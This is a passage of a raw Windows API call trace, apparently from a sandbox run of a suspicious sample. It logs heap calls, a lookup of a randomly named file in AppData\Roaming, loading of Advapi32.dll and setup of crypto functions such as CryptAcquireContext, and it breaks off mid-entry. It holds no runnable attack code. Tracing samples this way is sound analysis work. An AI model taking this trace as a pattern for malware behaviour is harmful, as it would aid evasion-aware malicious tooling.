0x2e7f878 [0226.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0226.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0226.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0226.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0226.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0226.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0226.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0226.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0226.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0226.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0226.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0226.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0226.592] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0226.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0226.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0226.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f8a0 [0226.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0226.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0226.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0226.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f8f0 [0226.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0226.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0226.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0226.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7faa8 [0226.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0226.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0226.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f8a0 | out: hHeap=0x970000) returned 1 [0226.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0226.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0226.592] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0226.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0226.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0226.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa08 [0226.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0226.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0226.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0226.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f8a0 [0226.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0226.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0226.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0226.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f968 [0226.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0226.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0226.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0226.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0226.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0226.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0226.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0226.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0226.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0226.593] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/CTe6ly.avi", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2fe9afe0, ftCreationTime.dwHighDateTime=0x1d5e841, ftLastAccessTime.dwLowDateTime=0xd1a4d120, ftLastAccessTime.dwHighDateTime=0x1d5e7c9, ftLastWriteTime.dwLowDateTime=0xd1a4d120, ftLastWriteTime.dwHighDateTime=0x1d5e7c9, nFileSizeHigh=0x0, nFileSizeLow=0x4f91, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="CTe6ly.avi", cAlternateFileName="")) returned 0xa87250 [0226.593] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0226.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0226.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0226.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0226.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0226.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0226.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0226.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0226.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fa08 | out: hHeap=0x970000) returned 1 [0226.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0226.594] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0226.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0226.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0226.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0226.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0226.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa08 [0226.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0226.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0226.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0226.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0226.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0226.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0226.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0226.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0226.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0226.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0226.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0226.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0226.594] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f918 [0226.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0226.594] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0226.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f918 | out: hHeap=0x970000) returned 1 [0226.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0226.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f80 [0226.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0226.595] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0226.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043b8 [0226.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0226.595] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0226.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0226.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0226.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e30 [0226.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0226.595] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0226.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0226.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0226.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0226.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0226.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0226.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0226.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0226.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0226.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0226.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0226.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0226.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0226.595] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0226.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0226.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0226.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f918 [0226.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0226.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0226.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0226.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f990 [0226.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0226.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0226.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0226.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f9b8 [0226.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0226.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0226.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0226.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0226.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0226.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0226.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0226.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0226.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0226.596] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0226.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0226.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0226.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0226.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0226.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0226.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0226.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0226.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f918 | out: hHeap=0x970000) returned 1 [0226.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0226.597] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0226.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0226.597] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0226.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0226.597] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0226.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0226.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0226.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0226.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c88 [0226.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0226.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0226.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0226.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0226.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d88 [0226.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f918 [0226.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0226.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0226.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0226.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa30 [0226.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0226.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0226.598] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0226.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0226.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0226.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0226.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0226.598] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0226.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0226.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0226.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fa30 | out: hHeap=0x970000) returned 1 [0226.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0226.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f918 | out: hHeap=0x970000) returned 1 [0226.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0226.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0226.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0226.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0226.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0226.598] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0226.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0226.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0226.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0226.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0226.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa30 [0226.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0226.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0226.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0226.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0226.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0226.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0226.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0226.599] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0226.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0226.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0226.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f918 [0226.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0226.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0226.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0226.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7b0 [0226.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0226.599] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.599] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0226.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0226.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0226.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0226.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0226.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0226.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0226.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0226.600] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.600] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0226.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04118 | out: hHeap=0x970000) returned 1 [0226.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0226.600] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0226.600] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0226.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0226.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69888, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0226.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0226.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0226.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69928, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0226.600] HeapFree (in: 